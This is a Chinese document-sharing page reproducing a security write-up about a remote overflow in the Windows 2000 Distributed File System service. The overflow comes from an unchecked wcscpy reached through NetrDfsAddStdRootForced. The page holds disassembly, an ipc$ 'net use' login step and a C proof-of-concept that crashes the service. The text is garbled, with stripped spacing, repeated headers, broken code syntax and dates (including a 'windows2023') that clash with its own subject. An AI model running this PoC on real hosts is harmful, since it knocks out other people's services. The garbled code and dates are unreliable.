最近發(fā)現(xiàn)的一個Distributed File System服務(wù)遠程溢出問題_第1頁
最近發(fā)現(xiàn)的一個Distributed File System服務(wù)遠程溢出問題_第2頁
最近發(fā)現(xiàn)的一個Distributed File System服務(wù)遠程溢出問題_第3頁
最近發(fā)現(xiàn)的一個Distributed File System服務(wù)遠程溢出問題_第4頁
最近發(fā)現(xiàn)的一個Distributed File System服務(wù)遠程溢出問題_第5頁
免費預(yù)覽已結(jié)束,剩余1頁可下載查看

下載本文檔

版權(quán)說明:本文檔由用戶提供并上傳,收益歸屬內(nèi)容提供方,若內(nèi)容存在侵權(quán),請進行舉報或認(rèn)領(lǐng)

文檔簡介

第第頁最近發(fā)現(xiàn)的一個DistributedFileSystem服務(wù)遠程溢出問題最近發(fā)現(xiàn)的一個DistributedFileSystem服務(wù)遠程溢出問題

發(fā)表于:2023-05-25來源::點擊數(shù):標(biāo)簽:Distributed最近發(fā)現(xiàn)File一個

創(chuàng)建時間:2023-03-13文章屬性:轉(zhuǎn)載著者:MID=11092">rootshell(sysadm_at_21)最近發(fā)現(xiàn)的一個DistributedFileSystem服務(wù)遠程溢出問題date:03/13/2023author:fzk:1734398MSN:sysadm@21email:sysadm@21URL:http://www.ns-

創(chuàng)建時間:2023-03-13

文章屬性:轉(zhuǎn)載

著者:MID=11092">rootshell(sysadm_at_21)

最近發(fā)現(xiàn)的一個DistributedFileSystem服務(wù)遠程溢出問題

date:03/13/2023

author:fzk

:1734398

MSN:sysadm@21

email:sysadm@21

URL:

最近發(fā)現(xiàn)的一個DistributedFileSystem服務(wù)遠程溢出問題

創(chuàng)建時間:2023-03-13

文章屬性:原創(chuàng)

文章提交:rootshell(sysadm_at_21)

最近發(fā)現(xiàn)的一個DistributedFileSystem服務(wù)遠程溢出問題

date:03/13/2023

author:fzk

:1734398

MSN:sysadm@21

email:sysadm@21

URL:

1.前言:

最近在windows2000advancedserver下研究DistributedFileSystem服務(wù)的時候,在當(dāng)中一個函數(shù)發(fā)現(xiàn)一個

溢出,經(jīng)過測試,發(fā)現(xiàn)需要遠程通過目標(biāo)機的管理員組成員和DistributedFileSystem服務(wù)建立namepipe,才能發(fā)生

溢出,不知道這樣的問題,屬于不屬于安全漏洞呢?

今天決定發(fā)出來給大家共同研究一下,說不定有可能其他高手發(fā)現(xiàn)不需要通過目標(biāo)機的管理員組成員權(quán)限來進行

溢出,那這個就算真正的(安全)問題了,而且危害性肯定也強了,那當(dāng)然也記得給我發(fā)個信通知一下如何實現(xiàn).:)

2.問題細(xì)節(jié):

這個溢出問題,是發(fā)生在DistributedFileSystem服務(wù)里面的NetrDfsAddStdRootForced函數(shù)在處理第四個參數(shù)

上面,這個第四個參數(shù)是會作為第五個參數(shù)傳遞給SetupStdDfs的,在這個函數(shù)里面調(diào)用wcscpy,問題出在這里沒有進行

邊界檢查,導(dǎo)致溢出的代碼如下:

NetrDfsAddStdRootForced函數(shù)

.text:0100A2B5movedi,[ebp+arg_C]

.text:0100A2B8testedi,edi

.text:0100A2AFjzloc_100A373

.text:0100A31Fpushedi

.text:0100A320push1

.text:0100A322push[ebp+arg_8]

.text:0100A325leaeax,[ebp+var_214]

.text:0100A32Bpush[ebp+arg_4]

.text:0100A32Epusheax

.text:0100A32FcallSetupStdDfs

SetupStdDfs函數(shù)

.text:01007FB4pushebp

.text:01007FB5movebp,esp

.text:01007FB7subesp,658h

.text:01007FBDpushebx

.text:01007FBEmovebx,ds:wcscpy

.text:01007FC4pushesi

.text:01007FC5pushedi

.text:01007FC6xoresi,esi

.text:01007FC8xoredi,edi

.text:01007FCAcmp[ebp+arg_10],esi

.text:01007FCDjnzshortloc_1007FE2

.text:01007FE2loc_1007FE2:

.text:01007FE2push[ebp+arg_10]

.text:01007FE5leaeax,[ebp+var_43C]

.text:01007FEBpusheax

.text:01007FECcallebx;wcscpy

調(diào)用流程為:

NetrDfsAddStdRootForced-SetupStdDfs-wcscpy

3.溢出測試方法:

(1).先使用目標(biāo)機器的管理員組成員建立一個ipc$連接

netuse\目標(biāo)機器ip\ipc$管理員組成員密碼/user:管理員組成員賬號

(2).使用如下(測試)代碼(測試):

#includestdio.h

#includestdlib.h

#includewindows.h

#includeLm.h

#includeLmdfs.h

#pragmacomment(lib,Netapi32.lib)

intmain(void)

{

wchar_ta[]=L\\ip\;//把ip替換為你的目標(biāo)機器ip

wchar_tb[4000];

LPWSTRServerName=a;

LPWSTRRootShare=Lfzk;

LPWSTRComment=Lfzk;

LPWSTRStore;

inti;

for(i=0;i2000;i++)

wcscat(b,LA);

Store=b;

if(NetDfsAddStdRootForced(ServerName,RootShare,Comment,Store)==NERR_Suclearcase/"target="_blank">ccess)

returnTRUE;

else

returnFALSE;

}

把以上代碼存為test.cpp,運行cltest.cpp編譯,然后執(zhí)行test.exe,到這里應(yīng)該目標(biāo)機器的

DistributedFileSystem服務(wù)已經(jīng)down掉了

4.附加信息:

在MSDN發(fā)現(xiàn)NetDfsAddStdRootForcedAPI在windows2023已經(jīng)被棄用了

DistributedFi

溫馨提示

  • 1. 本站所有資源如無特殊說明,都需要本地電腦安裝OFFICE2007和PDF閱讀器。圖紙軟件為CAD,CAXA,PROE,UG,SolidWorks等.壓縮文件請下載最新的WinRAR軟件解壓。
  • 2. 本站的文檔不包含任何第三方提供的附件圖紙等,如果需要附件,請聯(lián)系上傳者。文件的所有權(quán)益歸上傳用戶所有。
  • 3. 本站RAR壓縮包中若帶圖紙,網(wǎng)頁內(nèi)容里面會有圖紙預(yù)覽,若沒有圖紙預(yù)覽就沒有圖紙。
  • 4. 未經(jīng)權(quán)益所有人同意不得將文件中的內(nèi)容挪作商業(yè)或盈利用途。
  • 5. 人人文庫網(wǎng)僅提供信息存儲空間,僅對用戶上傳內(nèi)容的表現(xiàn)方式做保護處理,對用戶上傳分享的文檔內(nèi)容本身不做任何修改或編輯,并不能對任何下載內(nèi)容負(fù)責(zé)。
  • 6. 下載文件中如有侵權(quán)或不適當(dāng)內(nèi)容,請與我們聯(lián)系,我們立即糾正。
  • 7. 本站不保證下載資源的準(zhǔn)確性、安全性和完整性, 同時也不承擔(dān)用戶因使用這些下載資源對自己和他人造成任何形式的傷害或損失。

評論

0/150

提交評論